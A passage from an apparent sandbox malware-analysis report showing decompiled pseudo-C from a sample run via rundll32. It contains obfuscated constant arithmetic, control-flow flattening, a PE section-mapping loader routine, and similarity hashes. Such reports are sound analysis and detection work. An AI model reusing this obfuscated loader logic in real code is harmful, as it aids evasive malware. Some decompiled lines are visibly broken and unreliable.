                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t128;
                                                                                                                      				void* _t138;
                                                                                                                      				void* _t140;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				void* _t158;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t167;
                                                                                                                      				signed int* _t168;
                                                                                                                      				signed int* _t169;
                                                                                                                      
                                                                                                                      				_t165 = _a12;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t119);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0xd63ca;
                                                                                                                      				_v8 = 0x2a80fb;
                                                                                                                      				_v32 = 0xd656a7;
                                                                                                                      				_t142 = 0x2a;
                                                                                                                      				_v32 = _v32 * 0x76;
                                                                                                                      				_v32 = _v32 ^ 0x62cbe0fa;
                                                                                                                      				_v60 = 0xd42ea;
                                                                                                                      				_v60 = _v60 | 0xae184de3;
                                                                                                                      				_v60 = _v60 * 0x64;
                                                                                                                      				_v60 = _v60 ^ 0xa1370c8b;
                                                                                                                      				_v60 = _v60 ^ 0xa2441b47;
                                                                                                                      				_v28 = 0x613a22;
                                                                                                                      				_v28 = _v28 + 0xe1cd;
                                                                                                                      				_v28 = _v28 ^ 0x00621baf;
                                                                                                                      				_v48 = 0x1555f7;
                                                                                                                      				_v48 = _v48 | 0xf97f7abf;
                                                                                                                      				_v48 = _v48 ^ 0xf978b226;
                                                                                                                      				_v36 = 0xa4495c;
                                                                                                                      				_v36 = _v36 << 0xc;
                                                                                                                      				_v36 = _v36 ^ 0x449a63ff;
                                                                                                                      				_v64 = 0xc77e0d;
                                                                                                                      				_v64 = _v64 * 0x7d;
                                                                                                                      				_v64 = _v64 << 3;
                                                                                                                      				_v64 = _v64 / _t142;
                                                                                                                      				_v64 = _v64 ^ 0x0042e8ad;
                                                                                                                      				_v24 = 0xcd3d37;
                                                                                                                      				_v24 = _v24 ^ 0xb946add1;
                                                                                                                      				_v24 = _v24 ^ 0xb982581d;
                                                                                                                      				_v40 = 0xe4266b;
                                                                                                                      				_v40 = _v40 << 9;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x064c7215;
                                                                                                                      				_v44 = 0x9ee2d0;
                                                                                                                      				_v44 = _v44 + 0xdca1;
                                                                                                                      				_v44 = _v44 ^ 0x9755f080;
                                                                                                                      				_v44 = _v44 ^ 0x97c96657;
                                                                                                                      				_v20 = 0xa48706;
                                                                                                                      				_v20 = _v20 | 0xe10b6776;
                                                                                                                      				_v20 = _v20 ^ 0xe1a97c21;
                                                                                                                      				_v56 = 0x583a03;
                                                                                                                      				_v56 = _v56 * 0x56;
                                                                                                                      				_v56 = _v56 + 0x9dad;
                                                                                                                      				_v56 = _v56 * 0x55;
                                                                                                                      				_v56 = _v56 ^ 0xd77aa722;
                                                                                                                      				_v52 = 0xf9a5b4;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 + 0xffff4c61;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x033f85cc;
                                                                                                                      				_v16 = 0x1cccaa;
                                                                                                                      				_v16 = _v16 + 0x745b;
                                                                                                                      				_v16 = _v16 ^ 0x0015a734;
                                                                                                                      				_t143 = _v48;
                                                                                                                      				_t128 = E0018BE0B(_t143, _v36, _v64, _a12);
                                                                                                                      				_t138 = _t128;
                                                                                                                      				_t167 =  &(( &_v64)[8]);
                                                                                                                      				if(_t138 != 0) {
                                                                                                                      					_push(_t143);
                                                                                                                      					_t158 = E0017B0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
                                                                                                                      					_t168 =  &(_t167[5]);
                                                                                                                      					if(_t158 == 0) {
                                                                                                                      						L6:
                                                                                                                      						return _t158;
                                                                                                                      					}
                                                                                                                      					E0018FD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
                                                                                                                      					_t169 =  &(_t168[3]);
                                                                                                                      					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
                                                                                                                      					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
                                                                                                                      					while(_t163 < _t140) {
                                                                                                                      						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                      						E0018FD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
                                                                                                                      						_t169 =  &(_t169[3]);
                                                                                                                      						_t163 = _t163 + 0x28;
                                                                                                                      					}
                                                                                                                      					goto L6;
                                                                                                                      				}
                                                                                                                      				return _t128;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: bb07d28905f9fa7620ff9bd56e4bb22cf54fc8f7e85b2c878dda0ba406e3bb5d
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 7F5111B15083809FC354CF65C98691BFBF2BBC8748F409A1DFA995A220D7B5DA498F06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E001845CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				unsigned int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t260;
                                                                                                                      				intOrPtr _t280;
                                                                                                                      				intOrPtr _t283;
                                                                                                                      				void* _t285;
                                                                                                                      				intOrPtr _t286;
                                                                                                                      				void* _t288;
                                                                                                                      				intOrPtr* _t291;
                                                                                                                      				void* _t293;
                                                                                                                      				intOrPtr _t310;
                                                                                                                      				signed int _t313;
                                                                                                                      				signed int _t314;
                                                                                                                      				signed int _t315;
                                                                                                                      				void* _t317;
                                                                                                                      				void* _t318;
                                                                                                                      
                                                                                                                      				_t291 = _a8;
                                                                                                                      				_t312 = _a4;
                                                                                                                      				_push(_t291);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t260);
                                                                                                                      				_v16 = 0xeda856;
                                                                                                                      				_t310 = 0;
                                                                                                                      				_v12 = 0;
                                                                                                                      				_t318 = _t317 + 0x10;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x9530b9;
                                                                                                                      				_t293 = 0x1386c75;
                                                                                                                      				_v108 = _v108 + 0xffff8498;
                                                                                                                      				_v108 = _v108 + 0xffff62a2;
                                                                                                                      				_v108 = _v108 ^ 0x009417f2;
                                                                                                                      				_v72 = 0x4d29da;
                                                                                                                      				_v72 = _v72 | 0x3a723bc7;
                                                                                                                      				_v72 = _v72 ^ 0x3a7f3bde;
                                                                                                                      				_v68 = 0xbb7b0e;
                                                                                                                      				_v68 = _v68 | 0x90968cd5;
                                                                                                                      				_v68 = _v68 ^ 0x90bfffdf;
                                                                                                                      				_v32 = 0x962435;
                                                                                                                      				_v32 = _v32 << 9;
                                                                                                                      				_v32 = _v32 ^ 0x2c486a00;
                                                                                                                      				_v124 = 0x38cf9b;
                                                                                                                      				_t313 = 0x3a;
                                                                                                                      				_v124 = _v124 * 0x5b;
                                                                                                                      				_v124 = _v124 / _t313;
                                                                                                                      				_v124 = _v124 << 3;
                                                                                                                      				_v124 = _v124 ^ 0x02c91350;
                                                                                                                      				_v104 = 0xa200dd;
                                                                                                                      				_v104 = _v104 ^ 0x0aab722c;
                                                                                                                      				_v104 = _v104 + 0xffff0d17;
                                                                                                                      				_v104 = _v104 ^ 0x0a088008;
                                                                                                                      				_v136 = 0xa03782;
                                                                                                                      				_v136 = _v136 >> 4;
                                                                                                                      				_v136 = _v136 >> 0xf;
                                                                                                                      				_v136 = _v136 + 0xffffdc54;
                                                                                                                      				_v136 = _v136 ^ 0xffffdc68;
                                                                                                                      				_v100 = 0xea2f66;
                                                                                                                      				_v100 = _v100 + 0xffffd1b3;
                                                                                                                      				_v100 = _v100 + 0xffff51f8;
                                                                                                                      				_v100 = _v100 ^ 0x00e840e3;
                                                                                                                      				_v132 = 0xadb516;
                                                                                                                      				_v132 = _v132 + 0xffff9028;
                                                                                                                      				_v132 = _v132 * 0x44;
                                                                                                                      				_v132 = _v132 + 0xffffe891;
                                                                                                                      				_v132 = _v132 ^ 0x2e08c107;
                                                                                                                      				_v140 = 0xeec816;
                                                                                                                      				_v140 = _v140 >> 7;
                                                                                                                      				_v140 = _v140 >> 0xf;
                                                                                                                      				_v140 = _v140 << 5;
                                                                                                                      				_v140 = _v140 ^ 0x000acf9f;
                                                                                                                      				_v116 = 0xb8b4c3;
                                                                                                                      				_v116 = _v116 + 0x5cf4;
                                                                                                                      				_v116 = _v116 + 0xffff9c7f;
                                                                                                                      				_v116 = _v116 ^ 0x00b90cd0;
                                                                                                                      				_v144 = 0x42ac99;
                                                                                                                      				_v144 = _v144 + 0xfffff6b6;
                                                                                                                      				_v144 = _v144 | 0xd26fea09;
                                                                                                                      				_v144 = _v144 + 0xcbeb;
                                                                                                                      				_v144 = _v144 ^ 0xd277b085;
                                                                                                                      				_v96 = 0x1bc5eb;
                                                                                                                      				_v96 = _v96 * 0x6c;
                                                                                                                      				_v96 = _v96 + 0x8f6c;
                                                                                                                      				_v96 = _v96 ^ 0x0bb05dde;
                                                                                                                      				_v48 = 0x1a2576;
                                                                                                                      				_v48 = _v48 * 0x64;
                                                                                                                      				_v48 = _v48 ^ 0x0a36ba39;
                                                                                                                      				_v88 = 0xc7f5d;
                                                                                                                      				_v88 = _v88 >> 4;
                                                                                                                      				_v88 = _v88 >> 0xf;
                                                                                                                      				_v88 = _v88 ^ 0x00037446;
                                                                                                                      				_v84 = 0x3f34b5;
                                                                                                                      				_t314 = 0x5e;
                                                                                                                      				_v84 = _v84 * 0x31;
                                                                                                                      				_v84 = _v84 >> 0xe;
                                                                                                                      				_v84 = _v84 ^ 0x000d159a;
                                                                                                                      				_v120 = 0x5d4df8;
                                                                                                                      				_v120 = _v120 + 0xffffa239;
                                                                                                                      				_v120 = _v120 << 4;
                                                                                                                      				_v120 = _v120 ^ 0x05c58312;
                                                                                                                      				_v60 = 0x26932d;
                                                                                                                      				_v60 = _v60 / _t314;
                                                                                                                      				_v60 = _v60 ^ 0x000131ea;
                                                                                                                      				_v28 = 0x785747;
                                                                                                                      				_v28 = _v28 ^ 0x77c5d7dc;
                                                                                                                      				_v28 = _v28 ^ 0x77b818bc;
                                                                                                                      				_v56 = 0xd134ba;
                                                                                                                      				_t315 = 0x67;
                                                                                                                      				_v56 = _v56 * 7;
                                                                                                                      				_v56 = _v56 ^ 0x05bb4239;
                                                                                                                      				_v40 = 0xd9afd1;
                                                                                                                      				_v40 = _v40 * 0x25;
                                                                                                                      				_v40 = _v40 ^ 0x1f79b6d7;
                                                                                                                      				_v128 = 0x3f4f78;
                                                                                                                      				_v128 = _v128 / _t315;
                                                                                                                      				_v128 = _v128 | 0x7b2b5a07;
                                                                                                                      				_v128 = _v128 + 0xfffffa98;
                                                                                                                      				_v128 = _v128 ^ 0x7b2edba2;
                                                                                                                      				_v80 = 0xe956c4;
                                                                                                                      				_v80 = _v80 << 5;
                                                                                                                      				_v80 = _v80 ^ 0x1d2c49e8;
                                                                                                                      				_v64 = 0x3f3e0b;
                                                                                                                      				_v64 = _v64 * 5;
                                                                                                                      				_v64 = _v64 ^ 0x01394f8d;
                                                                                                                      				_v112 = 0xfc7f0a;
                                                                                                                      				_v112 = _v112 + 0xffff18e0;
                                                                                                                      				_v112 = _v112 + 0xffffa855;
                                                                                                                      				_v112 = _v112 ^ 0x00f14c19;
                                                                                                                      				_v92 = 0x78d624;
                                                                                                                      				_v92 = _v92 << 6;
                                                                                                                      				_v92 = _v92 + 0xffffec5c;
                                                                                                                      				_v92 = _v92 ^ 0x1e335a68;
                                                                                                                      				_v36 = 0xd9641a;
                                                                                                                      				_v36 = _v36 + 0xffff84de;
                                                                                                                      				_v36 = _v36 ^ 0x00d9de20;
                                                                                                                      				_v44 = 0x6f829b;
                                                                                                                      				_v44 = _v44 ^ 0xdbcb61d0;
                                                                                                                      				_v44 = _v44 ^ 0xdba9195b;
                                                                                                                      				_v52 = 0xea26f7;
                                                                                                                      				_v52 = _v52 + 0xffff0808;
                                                                                                                      				_v52 = _v52 ^ 0x00eef997;
                                                                                                                      				_v76 = 0xef1604;
                                                                                                                      				_v76 = _v76 + 0xfcdc;
                                                                                                                      				_v76 = _v76 + 0xffff9946;
                                                                                                                      				_v76 = _v76 ^ 0x00e2e7da;
                                                                                                                      				while(_t293 != 0x1386c75) {
                                                                                                                      					if(_t293 == 0x185c552) {
                                                                                                                      						_push(_t293);
                                                                                                                      						_push(_t293);
                                                                                                                      						_t280 = E00183512(_v20);
                                                                                                                      						_v24 = _t280;
                                                                                                                      						if(_t280 != 0) {
                                                                                                                      							_t293 = 0x84b6bf9;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						if(_t293 == 0x1b7bba2) {
                                                                                                                      							E001768DE(_v36, _v44, _v52, _v76, _v24);
                                                                                                                      						} else {
                                                                                                                      							if(_t293 == 0x8150c28) {
                                                                                                                      								_t283 =  *0x195c9c; // 0x0
                                                                                                                      								_t285 = E0017AD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
                                                                                                                      								_t318 = _t318 + 0x40;
                                                                                                                      								if(_t285 == _v124) {
                                                                                                                      									_t293 = 0x185c552;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t293 != 0x84b6bf9) {
                                                                                                                      									L13:
                                                                                                                      									if(_t293 != 0x3792bf2) {
                                                                                                                      										continue;
                                                                                                                      									} else {
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									_t286 =  *0x195c9c; // 0x0
                                                                                                                      									_t222 =  &_v128; // 0xe840e3
                                                                                                                      									_t288 = E0017AD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
                                                                                                                      									_t318 = _t318 + 0x40;
                                                                                                                      									if(_t288 == _v136) {
                                                                                                                      										 *_t291 = _v24;
                                                                                                                      										_t310 = 1;
                                                                                                                      										 *((intOrPtr*)(_t291 + 4)) = _v20;
                                                                                                                      									} else {
                                                                                                                      										_t293 = 0x1b7bba2;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t310;
                                                                                                                      				}
                                                                                                                      				_t293 = 0x8150c28;
                                                                                                                      				goto L13;
                                                                                                                      			}
                                                                                                                      0x001846cc
                                                                                                                      0x001846d4
                                                                                                                      0x001846d9
                                                                                                                      0x001846de
                                                                                                                      0x001846e6
                                                                                                                      0x001846ee
                                                                                                                      0x001846f6
                                                                                                                      0x001846fe
                                                                                                                      0x00184706
                                                                                                                      0x0018470e
                                                                                                                      0x00184716
                                                                                                                      0x00184723
                                                                                                                      0x00184727
                                                                                                                      0x0018472f
                                                                                                                      0x00184737
                                                                                                                      0x0018473f
                                                                                                                      0x00184744
                                                                                                                      0x00184749
                                                                                                                      0x0018474e
                                                                                                                      0x00184756
                                                                                                                      0x0018475e
                                                                                                                      0x00184766
                                                                                                                      0x0018476e
                                                                                                                      0x00184776
                                                                                                                      0x0018477e
                                                                                                                      0x00184786
                                                                                                                      0x0018478e
                                                                                                                      0x00184796
                                                                                                                      0x0018479e
                                                                                                                      0x001847ab
                                                                                                                      0x001847af
                                                                                                                      0x001847b7
                                                                                                                      0x001847bf
                                                                                                                      0x001847cc
                                                                                                                      0x001847d2
                                                                                                                      0x001847da
                                                                                                                      0x001847e2
                                                                                                                      0x001847e7
                                                                                                                      0x001847ec
                                                                                                                      0x001847f4
                                                                                                                      0x00184803
                                                                                                                      0x00184806
                                                                                                                      0x0018480a
                                                                                                                      0x0018480f
                                                                                                                      0x00184817
                                                                                                                      0x0018481f
                                                                                                                      0x00184827
                                                                                                                      0x0018482c
                                                                                                                      0x00184834
                                                                                                                      0x00184844
                                                                                                                      0x00184848
                                                                                                                      0x00184850
                                                                                                                      0x0018485b
                                                                                                                      0x00184866
                                                                                                                      0x00184871
                                                                                                                      0x0018487e
                                                                                                                      0x0018487f
                                                                                                                      0x00184883
                                                                                                                      0x0018488b
                                                                                                                      0x00184898
                                                                                                                      0x0018489c
                                                                                                                      0x001848a4
                                                                                                                      0x001848b7
                                                                                                                      0x001848bb
                                                                                                                      0x001848c3
                                                                                                                      0x001848cb
                                                                                                                      0x001848d3
                                                                                                                      0x001848db
                                                                                                                      0x001848e8
                                                                                                                      0x001848f0
                                                                                                                      0x001848fd
                                                                                                                      0x00184901
                                                                                                                      0x00184909
                                                                                                                      0x00184911
                                                                                                                      0x00184919
                                                                                                                      0x00184921
                                                                                                                      0x00184929
                                                                                                                      0x00184931
                                                                                                                      0x00184936
                                                                                                                      0x0018493e
                                                                                                                      0x00184946
                                                                                                                      0x00184951
                                                                                                                      0x0018495c
                                                                                                                      0x00184967
                                                                                                                      0x0018496f
                                                                                                                      0x00184977
                                                                                                                      0x0018497f
                                                                                                                      0x00184987
                                                                                                                      0x0018498f
                                                                                                                      0x00184997
                                                                                                                      0x0018499f
                                                                                                                      0x001849a7
                                                                                                                      0x001849af
                                                                                                                      0x001849b7
                                                                                                                      0x001849c5
                                                                                                                      0x00184ad4
                                                                                                                      0x00184ad5
                                                                                                                      0x00184add
                                                                                                                      0x00184ae2
                                                                                                                      0x00184aed
                                                                                                                      0x00184aef
                                                                                                                      0x00000000
                                                                                                                      0x00184aef
                                                                                                                      0x001849cb
                                                                                                                      0x001849d1
                                                                                                                      0x00184b41
                                                                                                                      0x001849d7
                                                                                                                      0x001849dd
                                                                                                                      0x00184a72
                                                                                                                      0x00184aaf
                                                                                                                      0x00184ab4
                                                                                                                      0x00184abb
                                                                                                                      0x00184ac1
                                                                                                                      0x00000000
                                                                                                                      0x00184ac1
                                                                                                                      0x001849e3
                                                                                                                      0x001849e9
                                                                                                                      0x00184afe
                                                                                                                      0x00184b04
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00184b0a
                                                                                                                      0x001849ef
                                                                                                                      0x001849fb
                                                                                                                      0x00184a10
                                                                                                                      0x00184a48
                                                                                                                      0x00184a4d
                                                                                                                      0x00184a54
                                                                                                                      0x00184b15
                                                                                                                      0x00184b17
                                                                                                                      0x00184b1f
                                                                                                                      0x00184a5a
                                                                                                                      0x00184a5a
                                                                                                                      0x00000000
                                                                                                                      0x00184a5a
                                                                                                                      0x00184a54
                                                                                                                      0x001849e9
                                                                                                                      0x001849dd
                                                                                                                      0x001849d1
                                                                                                                      0x00184b55
                                                                                                                      0x00184b55
                                                                                                                      0x00184af9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: 1b03a2d946ab38a77f472bedde630cf7f053d643425b66748d158fc11bd3b5df
                                                                                                                      • Instruction ID: 784ace14f8f575d57b992b7367b3382e779e01903f574303f276837a03a367fa
                                                                                                                      • Opcode Fuzzy Hash: 1b03a2d946ab38a77f472bedde630cf7f053d643425b66748d158fc11bd3b5df
                                                                                                                      • Instruction Fuzzy Hash: 57D10FB24087819FD768CF65C989A5BBBF1BBD4708F508A1DF2D986260D7B19948CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0017E243() {
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				intOrPtr _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				intOrPtr _v28;
                                                                                                                      				char _v32;
                                                                                                                      				char _v36;
                                                                                                                      				char _v40;
                                                                                                                      				char _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				intOrPtr _t246;
                                                                                                                      				signed int _t250;
                                                                                                                      				intOrPtr _t256;
                                                                                                                      				intOrPtr _t261;
                                                                                                                      				intOrPtr _t262;
                                                                                                                      				signed int _t264;
                                                                                                                      				signed int _t265;
                                                                                                                      				signed int _t266;
                                                                                                                      				signed int _t267;
                                                                                                                      				signed int _t268;
                                                                                                                      				signed int _t269;
                                                                                                                      				intOrPtr _t277;
                                                                                                                      				void* _t300;
                                                                                                                      				char _t304;
                                                                                                                      				void* _t305;
                                                                                                                      				void* _t307;
                                                                                                                      
                                                                                                                      				_v20 = 0x755bf0;
                                                                                                                      				_v16 = 0xbb5ee2;
                                                                                                                      				_v12 = 0xb403bb;
                                                                                                                      				_t262 = 0;
                                                                                                                      				_v8 = 0;
                                                                                                                      				_v108 = 0x84f903;
                                                                                                                      				_v108 = _v108 << 0xe;
                                                                                                                      				_v108 = _v108 | 0x00052a35;
                                                                                                                      				_v108 = _v108 + 0x3d3f;
                                                                                                                      				_v108 = _v108 ^ 0x3e47d87c;
                                                                                                                      				_v88 = 0x71c3c4;
                                                                                                                      				_v88 = _v88 + 0xffffe131;
                                                                                                                      				_t264 = 0x3b;
                                                                                                                      				_v88 = _v88 / _t264;
                                                                                                                      				_v88 = _v88 ^ 0x40aa9d70;
                                                                                                                      				_t300 = 0xfb124ba;
                                                                                                                      				_v88 = _v88 ^ 0x40a0f61c;
                                                                                                                      				_v52 = 0x7362f6;
                                                                                                                      				_v52 = _v52 | 0xb899219a;
                                                                                                                      				_v52 = _v52 ^ 0xb8f51d59;
                                                                                                                      				_v56 = 0xfd4e8c;
                                                                                                                      				_t265 = 0x71;
                                                                                                                      				_v56 = _v56 * 0x54;
                                                                                                                      				_v56 = _v56 ^ 0x53104169;
                                                                                                                      				_v92 = 0xd5c279;
                                                                                                                      				_v92 = _v92 + 0x8479;
                                                                                                                      				_v92 = _v92 + 0xffffbe38;
                                                                                                                      				_v92 = _v92 / _t265;
                                                                                                                      				_v92 = _v92 ^ 0x0004c231;
                                                                                                                      				_v68 = 0x9eb1ac;
                                                                                                                      				_t266 = 0x4a;
                                                                                                                      				_v68 = _v68 * 0x7b;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0x87ec7921;
                                                                                                                      				_v104 = 0x24a1b7;
                                                                                                                      				_v104 = _v104 << 4;
